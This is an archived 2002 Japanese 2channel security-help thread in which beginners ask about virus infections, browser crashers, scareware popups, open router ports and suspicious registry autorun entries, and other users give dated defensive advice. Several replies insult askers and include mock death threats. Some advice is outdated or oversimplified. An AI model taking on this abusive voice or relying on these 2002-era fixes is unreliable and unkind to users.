バツも微妙に小さかったりと見たことがなかったもので・・・。
その窓の使ってるのを「プロセス」で見たら「csrss.exe」と出たんですが
なんのことやらサパーリです
あ、申し訳ないっす。
OSはwinXPのSP1でつ。windows messengerはヴァージョンアップしたら
MSN messengerになってしまいました。
>91
レスさんくす〜
「小さい窓」つーのでこれみたいですわ。広告だったらもっとわかりやす
かったんですが。なるほど。
おとなしくファイアーウォール使いまふ・・・
>>94
サービス止めるという手もあるが。
9611:02/12/06 16:44
>>79>>81
ありがとうございました。
だけどなんで感染したんだろ?
どのように感染するウィルスなんだろう?
とりあえず不安なのでシマンテックのCIH駆除ツール使ってみます。
>>82
ありがとうございます。
98でも検出されちゃう事あるんですか。
NT系だけなのかと思ってました。
9711:02/12/06 16:49
CIH駆除ツールを使ったら
"The W95.CIH virus was not found in memory."
との結果でした。
とりあえず一安心でしょうか?
いろいろ教えてくれた方々、本当にありがとうございました。
98名無しさん@お腹いっぱい。 :02/12/06 16:59
インターネットやる人は、セキュリティのことを考えて
ネット専用に使うパソコンとそれ以外のパソコンという感じで
使い分けてる人が多いんでしょうか?
99名無しさん@お腹いっぱい。:02/12/06 17:00
先程2CHのスレに貼ってあったアドレスを
クリックしたらブラクラでした。
電源OFFにして立ち上げ直し、ウィルスチェックを
かけたら(Norton Antivirus)、1ファイル発見されました。
ファイル名:I50[4]
ウィルス名:VBS.Internal
これはこのまま削除すれば良いのでしょうか。
100名無しさん@お腹いっぱい。:02/12/06 17:09
101名無しさん@お腹いっぱい。:02/12/06 17:17
>>100
1のHPで検索して、100さんのHPへ行きつき、
恐る恐る先程削除しました。
ちょっと怖かったのですが、レスを見てこれで大丈夫だと
確信しました。お手数お掛けしました。
どうもありがとうございました。
>>78=DQN厨房
薮叩きもいい加減にしる。
皆さん質問です。助けてください。
>102って藪本人ですか?
104放置汁:02/12/06 17:45
スレ違いなので隔離スレでやってくださいです。
105名無しさん@お腹いっぱい。:02/12/06 18:15
>>103
確実に言える事はオマエがどうしようもないアフォだと言うことだYO.
106名無しさん@お腹いっぱい。:02/12/06 18:18
あの、DMZ機能を利用して防御パソコンを
作れると聞いたのですが、どういうことでしょうか?
そう言われましても…
108名無しさん@お腹いっぱい。:02/12/06 18:23
防御パソコンと言う言葉を良く耳にするので質問したのですが・・・
>>106
DMZに存在していないプライベートIPアドレスを設定する。
そうするとポートスキャンやpingスキャンに時間がかかるようになる。

こういうことか?
110名無しさん@お腹いっぱい。:02/12/06 18:31
あ、そうなんですか。有り難う御座います
>>78
もしかしてあなたは自分の事を上級者だと思ってるんじゃないですか?
でも、御指摘の点についてはあなたの知識は初級レベルですよ。
DLLやランタイムとかがないと活動できないウィルスがあるので不要なDLLや
ランタイムは入れないというのは常識だと思います。ランタイムじゃないけど、
マクロウィルスでもマイクロソフトOffice製品がないと動かないそうです。
http://www.iwakuniit.net/newVirus/3-0-0.htm
>特にWindows98、InternetExplorer5以降は、ワードやエクセルに採用し
>セキュリティ上、問題があると再三指摘されてきたActiveXコントロール、
>VBS(ビジュアルベーシックスクリプト)とWSH(WindowsScriptingHost)が
>標準で導入されたため、それを利用したウィルスがたくさん登場しています。

http://www.symantec.co.jp/region/jp/sarcj/win.script.hosting.html
>VBS.LoveLetter.Aのようなワームが急激に広まり、多大な被害を与える脅威と
>なったのは、どのような背景によるものでしょうか?
・・・・・
>電子メールに添付された.vbsファイルとして届くウィルスから身を守るための
>防御手段の1つとして、Windows Scripting Hostを無効にするか、または削除
>する方法があります。
あーあ

漏れは知らんぞ。見なかった事にしとく
一抜けた
相変わらず論点がずれてるな。
潔く>>78も身を引けや。粘着みぐるしいぞ。
115名無しさん@お腹いっぱい。:02/12/06 23:38
さっきHP(エロサイトではない)をみてると、いきなりMicrosoftから画面に、
他人にPCに侵入された恐れがあるから、防御用のソフトをカードで買えみたい
な内容だったのですが、これはPCが誰かに侵入されたと考えていいのですか?
ちなみに回線はADSLでチャットはやります。
( ´ー`)oO(言われたことを素直に信じるなんてかわいいわねぇ・・・。たべちゃいたい)
うむ。日本の将来は期待が持てるのか不安なのかよくわからんぞ。
>>115
http://www.zdnet.co.jp/news/0212/06/nebt_15.html
もしよければ、一緒に訴えてあげてください
119名無しさん@お腹いっぱい。:02/12/07 00:59
>>115
消火器や浄水器の訪問販売・逆探知商法と同じです。
よく考えましょう。
真面目に困ってます。
2ちゃんに個人情報を書かれてしまい、それからイタ電ばかり。
1人だけでなく何人も被害にあっており、
警察にも相談中なんですが、書き込んだ人間がまた書き込みしたりして
収集つきません。これって書き込んだ人って特定できますか?
他板から来てる、この板の初心者です。
>>120
書き込んだ人間を特定するのは警察の仕事、っつーか個人では例え
IPアドレスを収集できたとしても、使用しているプロバくらいしかわからんよ
警察にしつこく言った方がいいかと・・・
122名無しさん@お腹いっぱい。:02/12/07 03:36
すみません、教えていただきたいのですが
IPアドレスが掲示板上に載ってしまったら
個人情報の何が分かってしまうんでしょうか?
今晩それに気づき、寝ずにいろいろ調べていますが
いまいち良く分かりません。
御教授、宜しくお願いいたします。
>>122
>>121の書き込みとこのスレのテンプレ>>9を見た上で聞いてるんなら
お前の書き込みからお前の個人情報を超能力で割り出して
お前を探し出して頃してやる
124名無しさん@お腹いっぱい。:02/12/07 03:41
すみません、打つのが遅くて気付かなかったんですが
121さんのおっしゃる通り、個人情報は分からないんですね。
でも、一緒に会社のアドレスみたいのも載ってる人がいて
試しにhttp://wwwの後ろに入れたら会社のサイトが
出てきました。
これが掲示板上に載っているということは、一般的にマズイ事
のような気がします。管理人に言った方がいいでしょうかね??
125名無しさん@お腹いっぱい。:02/12/07 03:45
>>122
あなたが固定IPなのかどうかが論点です。まぁIPアドレスが載った事
を心配されてるようなので、固定なのでしょう。知られると・・・。
アタックされPCが破壊され・・・なんてことは、あんまりないですよ。
ハッカーが他のサーバなどにアタックをかけるための踏み台になる可能性
は、ありますがね。
126名無しさん@お腹いっぱい。:02/12/07 03:46
123さん、本当に打つのが遅くて気が付かなかったんです。
すみません。御冗談とは言え、本当にビビってるところなので
あまり脅かさないで下さいね。
御助言ありがとうございました。
安心して寝ようと思います。
おい知障野郎
具体的に何がまずいか明示してから質問しろ
冗談じゃねーよ
テンプレ読まない教えて君は頃されて当然だ
129名無しさん@お腹いっぱい。:02/12/07 03:49
125さんありがとうございます。
プロバイダーの方では24時間交代のIPということでした。
多分、大丈夫なのでしょうね。
130名無しさん@お腹いっぱい。:02/12/07 03:53
>>127,128
まぁまぁ、マターリしようよ
夜もまだ長いし( ・∀・) 
>>129
なら大丈夫ですよ。安心して早く寝ましょう☆



     /\⌒ヽペタン
   /  /⌒)ノ ペタン
  ∧_∧ \ (( ∧_∧
 (; ´Д`))' ))(・∀・ ) < ひとまずもちついてやるからな!
 /  ⌒ノ ( ⌒ヽ⊂⌒ヽ
.(O   ノ ) ̄ ̄ ̄()__   )
 )_)_) (;;;;;;;;;;;;;;;;;;;)(_(
132129:02/12/07 03:59
130さん、ありがとうございます!!
今晩の事はかなり焦りまくってパニクってました。
スレの約束事も無視した形になってすみませんでした。
でも、ここで直接聞いた事でやっと安心できました。
それでは、お先に失礼します。。。
133名無しさん@お腹いっぱい。:02/12/07 05:56
緊急です!!!
昨日、mxで6時間くらい遊んだあと、ノートンが自動でウイルスチェック
をしてくれたんですが、○○○ラブレターなのものをハッケソしてくれた
のはいいんですが、「駆除できませんでした!」というのです。
ビビって私はなんとか永久的の追放(?)みたいな事をしたので、
再度チェックしてもなにも引っかからない状態なのですが、_default
とか、怪しげなものがマイコンにはいっているのです。まだ感染している
ならどうすればよいのでしょうか?今するべき事はなんでしょうか?
教えて君で本当にすいません。。
>>133
MXやめれ、そんな事でいちいち質問するようじゃ、いつかPC壊すぞ(w
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/
こんな奴がMXやってるなんて驚きだな
136名無しさん@お腹いっぱい。:02/12/07 12:59
>>133
ウイルスが怖くてMXをやろうと思わない。
FAQサイトや流通してるテキストで危険リストが出回ってるから参照すべし。
何を落としたかは見当が付くが・・・
138名無しさん@お腹いっぱい。:02/12/07 14:27
ネットにつないでいたら、
突然ダイアログボックスが出て、

「MICROSOFTから211.46(IPアドレスです)へ次のメッセージ」
と表示され、メッセージは


Fucking USA  



となってました。OKボタンを押すと、そのダイアログボックスは無くなりましたが、
怖いので、トレンドマイクロのオンラインスキャンを試みました。
ところが、サーバーが使用中といわれ、スキャンすることが出来ませんでした。
いままで、何度もやってますが、こんなことは初めてです。

なにかされてしまったのでしょうか?
>>138
なぁ、いい加減質問するときはスレを読めよ馬鹿
>>89あたりから読んでみろ厨房
140 :02/12/07 14:30
>>138 ネタだろ氏ねよ
141初心者:02/12/07 16:23
https://grc.com/x/ne.dll?bh0bkyd2

↑の『Probe My Ports』でテストしてみたら
・21(FTP)OPEN!
・23(Telnet)OPEN!
で他は全てStealth!でした。

開いているポートは何処で塞げばいいのですか?
ちなみに、ADSL(Yahoo!BB)で接続。
モデム→ルーター(ステルスの設定済み)→PC
PCはWin2000、ノートンパーソナルファイヤーウォール
マカフィーウィルススキャンを使ってます。

よろしくお願いします。
>>141 リンク死んでるんだけど。間違ってない?
>>142 生きてるよ
144初心者:02/12/07 16:28
https://grc.com/x/ne.dll?bh0bkyd2

↑で間違いないと思うのですが・・・
>>141 ルータ
>>141
何がしたいんだ?

Shields UP! is checking YOUR computer's Internet
connection security . . . currently located at IP:
ココを確認→
YBBだと自分のIPアドレスでない可能性があるということか…
>142&147
??? 藪?
149名無しさん@お腹いっぱい。:02/12/07 16:45
アウトルック等よりWEBメールのほうが盗聴されにくい
と聞きましたが、本当のところはどうでしょうか?
150初心者:02/12/07 16:49
『Test My Shields!』の方のテストでは問題なかったのです。
その右にある『Probe My Ports』の方でテストすると
ポート21と23がOPENとなるのです。
ちなみにIPはルーターの外側のヤフーから割り振られているIPが出ます。

↓のサイトを見ながらテストをしていました。
http://www.upsizing.co.jp/news/report0426.htm
ご免ファイアウォールのせいだった。
ルーターは何を使ってるの?
>>150
ルータの設定がうまくできていないんでは?
ルータ介さずに接続して試してみればどうかな。
153初心者:02/12/07 16:53
ルーターはIO DATA(NP-BBRsx)です。
ぐふっ、しらんなあ。漏れのは104FHといってオムロン社
の奴なんだがステルスになるけど・・・
>>141 「ルーター(ステルスの設定済み)」の中身を詳しく書いてみ。
156初心者:02/12/07 17:14
>>155
ステルスモード
NP-BBRsxがインターネットからのpingやWWWリクエスト応答しなくすることができます。
設定を有効にする場合は、チェックボックスにチェックを入れてください。

有効/無効の設定しかなくて、もちろん有効にしてます。
>>156 たぶんそのルータでは21番や23番は閉じれないんだろう。
IPフィルタリングもできないんでしょ。
158初心者:02/12/07 17:28
>>157
IP アドレスフィルタ
LAN側に接続している特定のIP アドレスをもつパソコンからの
インターネット側への通信を破棄する機能です。

TCP/UDPポートフィルタ
LAN側に接続している特定のTCP/UDPポートを利用したパソコンからの
インターネット側への通信を破棄する機能です。


ヘルプではこんな感じに書かれています。
やっぱり、もっとマシなルーター買えってことですかね?
逝ってきます・・・
みなさん色々と教えてくれてありがとうございました!
>>158
それを見る限り、多分できる。
丸投げだがhttp://www.iodata.co.jp/support/index.htm

駄目ならノートンパーソナルファイヤーウォールで。
160初心者:02/12/07 17:46
>>159
度々ありがとうございます。
もう少し見直して勉強してみます。
161名無しさん@お腹いっぱい。:02/12/07 18:07
ノートンアンチウィルスにはファイヤウォール機能ないんですか?
>>161
ないです

ノートン「アンチウィルス」ですから
>>161 ないよ。FW+アンチウィルスは「ノートンインターネットセキュリティ」
>>162-163

早速の回答ありがとうございました。
165壊れた:02/12/07 18:51
間違ってlist01.exeを実行してしまいました。すると、HDがガラガラいいだしてWINDOWSインストーラが始まって、以降ネットに接続できなくなりました。どうすれば直るか教えて下さい。まだWINDOWSは終了してません。
ケータイから書き込んだので外出かもしれませんが、アドバイスお願いします。
あるexeを踏んでしまったらwindowsのスタートのとこが爆発?
してしまったのですぐに電源落として再起動したんですが、
後でスキャンしてみるとウィルスらしきものがありませんでした。
大丈夫でしょうか?
167壊れた:02/12/07 19:02
WINDOWSインストーラがでたあと、選択した機能はCD―ROM、または現在使用できないほかのリムーバブルディスクにあります。ディスクを挿入してOKをクリックします。
とでます。一体何が起こったのですか?もしかして消えたのですか?助けて下さい。
>>165
HDDは止まったのですか?
169壊れた:02/12/07 19:11
HDDは動きますが起動しないプログラムがあります。
>>165>>167
ご愁傷様です
http://pc.2ch.net/test/read.cgi/pcqa/1032364515/188
以後、拾いものの実行ファイルには注意されたし
わけもわからずexeを実行するとは、おまえらなかなかやるな(*´∀`)
>>166
検出力の低いウィルス対策ソフトだとスキャンしてもウィルスを発見
できない事があります。
vectorで無料版アンチドートをダウンロードして、まず、一番上の
ボタンを押して「コード解析」だけでなく「圧縮ファイル」と
「電子メール確認」にもチェック入れてスキャンしてみてください。
それから、上から3つめのボタンを押してレジストリチェックして
ください。↓vector
http://www.vector.co.jp/soft/win95/util/se108623.html
173 :02/12/07 19:18
使用機種NEC LaVie L LL750/2 (PC-LL7502D)
使用メーラー Becky!Internet Mail version 2.05.06
使用ブラウザ IE 6.0.2600.0000

ウィルスW32.klezに関して質問したいのですが長文になるため2ch以外でウィルスに詳しい方のいるレスの早い掲示板を教えてください。
またはここで質問させていただいてよろしいでしょうか?
レスよろしくお願いいたします。

174壊れた:02/12/07 19:18
私はどうすればよいのでしょうか?
>>171
2chの勇気がなくて見れない画像御願いリストにあるみたいですね。
パソと引き換えにどんな画像が見れたかぜひ知りたいです。
>>172
ご丁寧にありがとうございます。
さっそくやってみます。
【注意】
荒らしがもっともらしいレスをつけることがありますので、よくよく注意して読んでください。
他のレスとの矛盾や話の展開から逸れていないか注意することです。
>>174
HDDが止まってなきゃHDD壊れるかも。
>>174
怪しいレジストリ出来てないか調べられるか?
181壊れた:02/12/07 19:24
>>179
インターネットエクスプローラが使用不能になったので見れません。
(現在かちゅーしゃからの書き込み)
どんなことが書いてあるのですか?
182壊れた:02/12/07 19:26
>>174
レジストリの見方はわかりますが、怪しいレジストリの見分け方がわかりません。
>>181
まずシャットダウンする前にバックアップしれ!
レジストリのHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に変な値ないか調べれ
わかんなきゃ書き出せ!
184182:02/12/07 19:27
174は180の間違い。スマソ
>>179に書いてあったわ
Whistler %System%\whismng.exe -next
>>173
できれば、感染パソコンと別のパソコンからアクセスした方が良いですよ。
いろんな所にメールを送るそうですから。
http://www.trendmicro.co.jp/klez/
187壊れた:02/12/07 19:36
>>183
そのレジストリには

(規定),
Appoint,
AtiPTA,
CloneCDElbyCDFL,
CMESys,
DAEMON Tools-1033,
IMEKRMIG6.1,
imjpmig,
IMJPMIG8.1,
LTSMMSG,
MSPY2002,
NECMFK,
NMFTASK,
PHIME2002A,
PHIME2002ASync,
RealTray,
WinampAgent,
WinHandAutoClean

という名前のアイコンがabのものがありました。
>>187
多いなw
具体のパス書いてくれよ
>>187
スパイウェアも入ってるしw
無事復帰したらPC内掃除しれ!
で、どうだったか?
ハードの容量が 6GBしかなく、軽いウイルスソフトを探しています。
VSOとウイルスバスターは、どちらが軽いのでしょうか?
OS は 98SE です。
191壊れた:02/12/07 19:56
>>188

>>187のパスは上から、
(値の設定なし)
C:\Program Files\Apoint2k\Apoint.exe
Antiptaxx.exe
"C:\Program Files\Elaborate Bytes\CloneCD\ElbycCheck.exe" /L ElbyCDFL
"C:\Program Files\Commom Files\CMEU\CMESys.exe"
"C:\Program Files\D-Tools\daemon.exe" -lang 1033
C:WINDOWS\ime\imkr6_1\IMEKRMIG.EXE
C:Program Files\Common Files\Microsoft Shared\IME\IMJP\imjpmig.exe /RemAdvDef /AIMEREG /Migration /SetPreload
C:WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
LTSMMSG.exe
C:WINDOWS\System32\IME\PINTLGNT\ImScInst.exe /SYNC
C:Program Files\necmfk\necmfk.exe
NMFTASK>EXE /RESET
C:WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
C:WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
C:Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER
"C:\Program Files\Winamp3\winamp.exe"
"C:\Program Files\WinHand\AUTOCLN>EXE"
>>173
Becky!でも回線つけたままでHTMLメールを見るとヤバイかもしれません。
マイクロソフトでIE6をIE6sp1にアップデートして、IEの累積的修正プログラム
インストールしてください。そうすればメールを開いただけでの受動(自動)
感染はなくなります。(ただし、それでも添付ファイルを実行すると感染します。)
193cheshire-cat ◆PhCATJR.v6 :02/12/07 20:01
>>List.exe踏んだお方

パソ屋に逝って、内蔵HDを一つ購入してくだされ。
今のHDを一旦外して、新HDを接続。
そして新HDにOS入れて、アンチウイルスソフト入れて下され。
各種設定を終えたら、電源カット。
そして新HDをマスター、旧HDをスレーブに接続して下され(そこら辺は、パソの説明書見ればええです)。
新HDからOSを起動しまする。

そして新HDからウイルススキャンしるなり、旧HDのデータを救出して下され。
つか、頑張ってね。
>>191
怪しいものはなさそうだな
>>190
アンチドートがお勧め。ウィルス検出力が非常に強力です。
vectorに無料版があります。
http://www.vector.co.jp/soft/win95/util/se108623.html
そこから作者をたどると、vintage-solutionsに有料版(安い)が
あります。ウィルス検出力はレジストリ検査ができる分無料版の方が
有料版より強力ですが、お金があれば利便性を考えて有料版も併用
されてはいかがでしょうか?
196壊れた:02/12/07 20:08
>>193
とんでもないことになっているようですが、
まだHDDにはたいしたものは入ってないので、再インストールで直るのならしても問題ないですか?
>>196
再インスコを躊躇しないなら問題なし
>>173
後は193のcheshire-catさんに聞いてください。
ウィルスを2000個も持っておられ非常に詳しく親切な方です。
>>196
再インストールが、リカバリをはじめとする
  ・本気でHDD全部を買ったときの状態に戻す
  ・HDD全てを一旦まっさらにしてOSのみ入れる
ことを指しているなら、再インストールで治る。
200壊れた:02/12/07 20:14
>>197
わずかながらのファイルをバックアップしたあと、再インストールしてみます。
再インストールすれば、パソコンは、購入直後の状態に戻るのですよね?
201cheshire-cat ◆PhCATJR.v6 :02/12/07 20:18
>>196
OSをクリーンインストールしると、IMEやATOKのユーザー辞書とか、メルファイル、メーラーのメルファイルとかは消えてまいまするが。

大した物が無いなら、ええかと。
でも本当に、今のHDでリカバリーしると、全部消えてまったりしまするよ?

もしどしても救出したいファイルがあるなら、HD付け替え技でファイル救出して乗り切るのが、一番ええと思うけど。
いずれにしても、最後に判断下すのは君自身っす。
>>200
バックアップしたファイルが感染してたら意味がないけどな。
203薮パソユーザー氏ね:02/12/07 20:18
198 名前:薮パソユーザー ◆0fQkHdNop2 :02/12/07 20:13
>>173
後は193のcheshire-catさんに聞いてください。
ウィルスを2000個も持っておられ非常に詳しく親切な方です。
>>201
メルファイルってなんですか?
205薮パソユーザー氏ね:02/12/07 20:19
私も訳分かんなくなってきたのでいっそのこと
リカバリしようかと。だけどもせとかもったいないしなあ
>>200
> 再インストールすれば、パソコンは、購入直後の状態に戻るのですよね?
知りません。お使いのパソコンの説明書をご参照ください。
207壊れた:02/12/07 20:21
こんな私にアドバイスをしてくださった皆さん、ありがとうございました。
今からバックアップをとり再セットアップを試みたいと思います。
成功したら報告しに戻ってきます。
208cheshire-cat ◆PhCATJR.v6 :02/12/07 20:22
>>173
KLEZはこのスレで、議論が出尽くしておりまする。
http://pc.2ch.net/test/read.cgi/sec/1030175440/
駆除ツールをDLして、セーフモードで利用して下され。

>>198
漏れは自分が知っている範疇でしかレス返していないんで、指名されるのは苦手っす。

>>204
OutlookやEudraやポスペで受信したメールとか、アドレス帳の意味で書いたんだけど。
舌足らずですたか。
>>208
> OutlookやEudraやポスペで受信したメールとか、アドレス帳の意味で書いたんだけど。
普通わからない。特に混乱している相手には我流の造語は却って逆効果。
210cheshire-cat ◆PhCATJR.v6 :02/12/07 20:27
>>207
超残念だけど、完全に元通りじゃないんすよ。
アプリの設定とか、カスタマイズしましたよねん?
例えばWordの行数とか。
そゆ毎日の積み重ねみたいなのは、消えてしまいますて、購入時の状態になってまいまする。

つかそれ系って。
挙動が異なるのが各種あって。
その感染HDで再起動した時が、ちょい怖かったんですよん、再起動時にガーッって音立てて、全てが終わるような予感がしたんで。
だから感染の可能性があるHDでOSを起動させない状態で、他のHDからOS起動して、データファイルをサルベージするようにお勧めしたんですよん。
>>208
勝手に推薦してすみません。

>>204
メールフォルダはたしかフォーマットが通常のと違っていてフォルダが
ファイル表示されてるのだと思います。
私の場合、\windows\Applicationdata\Identities\・・・\Microsoft
\Outlookexpressにあります。
212cheshire-cat ◆PhCATJR.v6 :02/12/07 20:30
>>209
混乱して困ってる人に、漏れ的用語を提示してもわかりづらいってのは、今かなりドキッっとしました。
以後気をつけまする、マジで反省。
>>壊れた
がんがれよ!

ハイ、次の方どうぞ
214名無しさん@お腹いっぱい。:02/12/07 20:43
IDSというシステムを初めて知りました。
ブラックアイスディフェンダーとかいうやつがいいとか
聞きました。あとスノーと?という物もあるらしいですね。
そこでどちらの方が堅固なセキュリティをもたらしてくれるでしょうか?
>>214
パーソナルファイアーウォール入れれ。
>>215
パーソナルでなくてもいい(専用機械でも可)がまあ同意。まずはそれ。
つーか、侵入検知って個人レベルで必要なのかな。
いや、>>214が個人ユーザとは限らんのだが。
217a:02/12/07 21:35
昨日ラブレター感染で今朝、OSごとなくなってる始末、んで、OSインストールに半日。さっきスキャンしたら
VBS.Internalというのと、 VBS.Network.Eという友達がいました。
ノートンは修復してくれず、削除できません。
本当に削除できないのでしょうか?
こいつらはどのくら怖い事するのでしょうか?
mxでマイナーな曲ばかり落してるとこうなっちゃうもんでしょうか?
教えて君で申し訳ないです。漏れもウイルスと一日戦ってつかれちゃいました。。
先日ノートンインターネットセキュリティー2003を買ってインストール
し終わったんですが、実際にウィルスに対応してるところを見てみたい(対処
してみたい)んですが、どうすればいいでしょうか?
「あんたらのブラクラウィルスリンクを貼ってみれA」スレ等のリンクを踏むのは
やっぱ危険なんですか?
>>218
そらあ危険だ。
http://www.eicar.org/download/eicar.com (テスト用ウイルス、無害)
でも踏んで試した方がよっぽど安全。
>>217
ネタくせぇ
「LoveLetter」で「OSあぼーん」なんて「彼」が食いつきそうだもの(藁
221a:02/12/07 22:00
>>220ネタじゃないんだって!!シンマテックのHPから削除方法
みて「検索」で探してあったら消せ、というから検索したら
ファイルはなく、のちにウイルスチェックでは絶対ひっかかる。。。
どうしたら消せるのぉぉぉぉぉぉ??おしえてください(__)
222名無しさん@お腹いっぱい。:02/12/07 22:05
>>219
ありがとうございます。ちゃんと反応してくれました。(あっけなく自動で^^;
223名無しさん@お腹いっぱい。:02/12/07 22:21
>>221
ネタじゃないなら、正確に詳しく状況を話せ。
>>223
たしかにOS再インストールしてウィルスチェックもせずに怪しい
ファイルを入れるつーのも信じがたい罠。
225壊れた→復活:02/12/08 02:23
165からこのスレに助けを求めていましたが、再インストールしてウイルス駆除に成功しました。
助言してくれた方々に重ねて御礼申し上げます。
226阪神 甲子園駅:02/12/08 04:24
アダルトネット通販のHPから大量に個人情報が盗まれたらしいですが、
本当なのかソースを調べたけど見つからないです。
ヤフーニュース、2ちゃんニュー速、ニュース実況、ダウソ板など探しました。
だれかご存知の方いませんか?

大スポに載っていたらしいとのことで大スポのサイトにも行ってみましたが、
載っていませんでした。
某神戸の組事務所宛てにようこというダッチワイフが注文されていたり、
会社社長がとてつもなくオオキイサイズのバイブを買っていたりしたらしいです。
2ちゃんやほかの掲示板に晒されたらしいのですが・・・・・・。
>>224
OSが割れだった、というオチなら全て筋が通る
228☆☆☆☆☆:02/12/08 05:20
226=228
ヤフーに見せかけた、アノx-beat系です。

以上、自作自演でした(・∀・)
230名無しさん@お腹いっぱい:02/12/08 05:51
先ほどブラクラを踏んでしまいまして、
とくにダメージは受けなかったのですが、
その時に出たウインドウ(・・のアクセスを許可/遮断)のところで
たしかExplorerからのアクセス・・というのを遮断し、
常にのところもチェックをいれたら、
エクスプローラーが使えなくなってしまいました。
どうすれば、修正できるでしょうか???

今はかちゅーしゃで書き込みしています。
>>230
オマエがどんなOSやセキュリティソフトを使ってるのかさえ
文面からさっぱり分からないのに答えられるわけねぇだろ
232名無しさん@お腹いっぱい:02/12/08 06:53
>231
素人でスマソ。
OSはXP ホームエディションです。
セキュリティはNIS2003です。
よろしくお願い致します。。
>>232
「許可/遮断」の問い合わせは恐らく「NIS2003」が出したもので、
「Internet Explorer」の接続が「常に遮断」へ設定されたせいで
ネットに繋げなくなってしまったのだろう。
「NIS2003」の設定パネルを呼び出してIEの項目を再設定すれば直ると思うぞ。
ノートンのマニュアルかヘルプに設定の仕方が書いてあるはず。
それでも解決しなければ、この板のノートンのスレで聞くか、ネットで検索すれ。

234名無しさん@お腹いっぱい:02/12/08 08:47
了解すますた、ありがとうございますた。
>>165 >>225
せめて、怪しいexeファイルを実行する前にウィルスチェックすべきでしたね。
236190:02/12/08 11:05
>>195

ありがとうございます。みてみます。
237名無しさん@お腹いっぱい。:02/12/08 14:23
検索してる余裕なんてない
とにかく早く回答が欲しい
そういう人はこちらのスレに質問してください
 
もの凄い勢いで質問に回答するスレ@sec
http://pc.2ch.net/test/read.cgi/sec/1039320021/l50
>>237
そこは質問スレッドではありません
>>238

>>237が まともに機能したら
ここで糞質問しても誘導されて
まともな相手をしてもらえなくなっちゃうもんね
240名無しさん@お腹いっぱい。 ::02/12/08 14:51
例えば、ウィルスに感染しても、リカバリでパソコン初期化
すれば、駆除されるのでしょうか?それともされないものも
あるのでしょうか?
>>240
フォーマットすりゃきれいさっぱり
242名無しさん@お腹いっぱい。 ::02/12/08 14:57
>>240
そうなんですか?やはり、さっぱりになれるんですよね。
>>242
ウイルスといえども単なる一つのプログラム
ウィルス感染したってんでシステム再インストールしたはいいが
その後サーバーに残しておいたメールを再度受信した際に
前と全く同じ経路で再感染したとゆー阿呆もいるんで扱いには気をつけるように。
245名無しさん@お腹いっぱい。 ::02/12/08 15:09
>>243 244
はい、勉強になりました。ありがとう。
>>240
BIOSを破壊するウイルスもあるよ。
破壊されたらBIOSを直せなきゃなおらん。
>>246
ときどきあるね、そーゆー古風なウィルス。
どこで拾ってくるのやら…ていうか今時の子って
BIOS復旧なんてできるんだろうか
>>165
あんさん、どこからそのexeファイル落としたの?
丁度その時間あたりにある板のあるスレでそれ
関連の祭りがあったけど、そこでひっかかった口?

もしそうだとしたら、自業自得ということもあるよ。
ちがうのであれば今度は気を付けて下され。
249名無しさん@お腹いっぱい。:02/12/08 16:37
WIN2K+NIS2001でセキュリティとプライバシーを最高強度にし、IE5.5のセキュリティレベル
を中にしています。先日アングラ系サイトを覗くと、私のパソコンのCドライブルートが
エクスプローラで表示されていました。
これは私のパソコンのHDDが覗かれていると解釈してよいのでしょうか。
だとしたら対策はありますか。フォルダの存在を見えなくするソフトも
あるらしいですが使ったら効果がありますか。
>>249
Cドライブをブラウザに表示させることは出来る。しかし、その内容を送信することはできない。
厨房が好むただの脅し。そういう知識もなしにアングラ行くな。以上
>>249
http://pc.2ch.net/test/read.cgi/hack/1038999540/9
できればそのページのURLを教えてくれ
スレタイの参考にするので
252249:02/12/08 16:55
>>250
どうも安心しました。

>>251
ttp://www.black-maria.org/manitou_s/
こういうのはアングラにはならないんですかね。

249のセキュリティ強度の場合、こちらが何らかの許可をしない限り
パソコンの中のファイルを操作されるという危険はないと考えても
よいですか。


253249:02/12/08 17:00
ルータはRTA50iでノートンアンチウィルスも入れてます。
254ぎもーん:02/12/08 17:08
LBI: リナックス ビジネス イニシアチブ
http://www.lbi.gr.jp/member/doc/19991015.html

こういうのはアリなんですかねー?
255250:02/12/08 17:21
>>252
ただし、IEのセキュリティパッチは洩れなくあてておく事。
あててあれば、ActiveXコンポーネントを(自動)インストールしない限りにおいては
最低のセキュリティレベルでもファイルを盗むことは出来ない。
256名無しさん@お腹いっぱい。:02/12/08 18:02
SnortとBlack ICEはどっちの方が多くのシグネチャに
対応してますか?
258名無しさん@お腹いっぱい。:02/12/08 18:24
だから こいつの目的は このスレ埋めることだから
間接的に この板全体を荒らすことにもなるしね
259名無しさん@お腹いっぱい。:02/12/08 18:27
もし この板の常連住人全員が(次スレの立て過ぎ)スレ立て権を失っても
テンプレ自体は保存してあるから

あとはこのスレとかに依頼して立ててもらうからいいけどね

スレッドを立てられないやつはここに書け!part22
http://cocoa.2ch.net/test/read.cgi/qa/1039087122/l50

(そういえば前回 ここで依頼して立ててもらったら
荒らしてたアフォがいたっけ?(藁))
260名無しさん@お腹いっぱい。:02/12/08 18:40
>>257 すいません。答えて貰えなかったもんで。
   自分では結構調べたんですが・・・
>>259
お前依頼者だな。
なんでスレ内で相談せずいきなり外部に依頼したんだ?
262名無しさん@お腹いっぱい。:02/12/08 20:56
ウィンドウズのアップデートできてる?
漏れんとこのPCだけどなんどやってもできない。
>>262
今やったが、すんなりいったぞ。
>>262
かなりFAQ。IEのセキュリティ設定がうまくないとかそんな理由。検索してみ。
>>262
たしかWindows板にWindows Updateに失敗したら上げるスレとかいうスレがあったような
266名無しさん@お腹いっぱい。:02/12/08 22:32
はじめまして。
どうしても、解決したい問題があります。
お手数ですが、ご回答ならびに、ご指導いただければ幸いです。
過去レスに同様の質問がありましたら、申し訳ありません。
問題: エクスプローラー(v6sp1で、最新のWindows UpDate実行済み)が勝手に
特定のサイトにアクセスする。 その度、自分の意志でブラウジングしている
Web画面が変わるので、 非常にウザイです。
自己流の対策: スパイウェアのチェックに「spybot」(ネトランの付録CD)
フリーソフトを入れています。
次に、パーソナルF/Wは「Out Post」を入れて、アプリケーション毎
と、ICMP拒否(IPのステルス)、NetBIOSの拒否を実行しています。
が、アプリケーションの接続拒否リストを件の、 URL、およびドメイン名
